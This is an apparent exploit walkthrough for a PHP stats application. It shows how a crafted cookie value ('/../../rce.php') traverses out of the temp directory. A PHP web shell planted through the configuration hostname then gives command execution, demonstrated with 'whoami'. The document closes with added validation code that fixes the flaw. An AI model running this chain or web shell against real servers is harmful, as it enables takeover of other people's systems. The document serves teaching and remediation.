It is not an exploit, it is an advisory (few details are published at the moment). However, we can check for ourselves.

Let's take a look at stats.php:

    if(!isset($_COOKIE['live_stats_id' . $hash]))
    {
        ...
    }
    else
    {
        # Backup from a previous request
        $live_stats_id = $_COOKIE['live_stats_id' . $hash];
    }

If the 'live_stats_id' . $hash cookie is not set, it is created (with values that we can change). Take a look here. $hash is:

    $hash = md5($_GET['cluster']);

and cluster is a variable that we can simply set via a GET request:

    if(isset($_GET['cluster']) && ($_GET['cluster'] != null)){ $cluster = $_GET['cluster'];}

So, if we set the $cluster variable to test, the cookie name should become:

    live_stats_id098f6bcd4621d373cade4e832627b4f6

Then we can see that the $live_stats_id variable, which can be controlled by us, is concatenated to the end of the $file_path variable:

    $file_path = rtrim($_ini->get('file_path'), '/') . DIRECTORY_SEPARATOR . 'live_stats.' . $live_stats_id;

The $file_path variable will become:

    Temp/live_stats.1022488408098f6bcd4621d373cade4e832627b4f6

We can change the cookie value to "/../../rce.php", so $file_path will become:

    Temp/live_stats./../../rce.php

Then we can see that a file called rce.php has been created in the root directory.

Now we must write code that allows us to execute commands. We go to "Edit configuration" (http://127.0.0.1/configure.php) and set this code as the hostname (of course, you can use any PHP code you want):

    <?php system($_GET['cmd']);?>

Then save the configuration. Now all you have to do is execute your command (example):

    http://127.0.0.1/rce.php?cmd=whoami

And you'll get:

    a:1:{s:33:"www-data :123";a:1:{s:10:"query_time";i:1;}}

Have fun, I hope you learned something.
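The root cause is that the cookie value reaches $file_path without any validation. The following is an added example, not code from the advisory or from the application, of validating the id before the path is built; the function names and the id pattern (decimal digits followed by the 32-character md5 of the cluster name, inferred from the sample value above) are assumptions.

```php
<?php
// Added example; is_valid_stats_id() and safe_stats_path() are hypothetical helpers.

// Assumption: a legitimate id is decimal digits followed by the md5 of the
// cluster name, as in the sample value 1022488408098f6bcd4621d373cade4e832627b4f6.
function is_valid_stats_id(string $id, string $hash): bool
{
    // \A and \z anchor the whole string, so '/', '.' and newlines never match.
    return preg_match('/\A[0-9]{1,20}[0-9a-f]{32}\z/', $id) === 1
        && substr($id, -32) === $hash;
}

// Returns the stats file path, or null when the id is rejected.
function safe_stats_path(string $base_dir, string $id, string $hash): ?string
{
    if (!is_valid_stats_id($id, $hash)) {
        return null;
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return null; // configured directory does not exist
    }
    $path = $base . DIRECTORY_SEPARATOR . 'live_stats.' . $id;
    // Defence in depth: the file must sit directly inside the base directory.
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed sample inputs: a well-formed id, the traversal value from the
// write-up, and an id whose hash suffix belongs to a different cluster.
$base = sys_get_temp_dir();
$hash = md5('test');
$samples = ['1022488408' . $hash, '/../../rce.php', '1022488408' . md5('other')];
foreach ($samples as $id) {
    $result = safe_stats_path($base, $id, $hash);
    printf("%-45s => %s\n", $id, $result ?? 'REJECTED');
}
```

Because the id can then only be digits plus a hash, the attacker no longer controls the file extension or directory, so configuration data written to the stats file cannot land as a .php file under the web root.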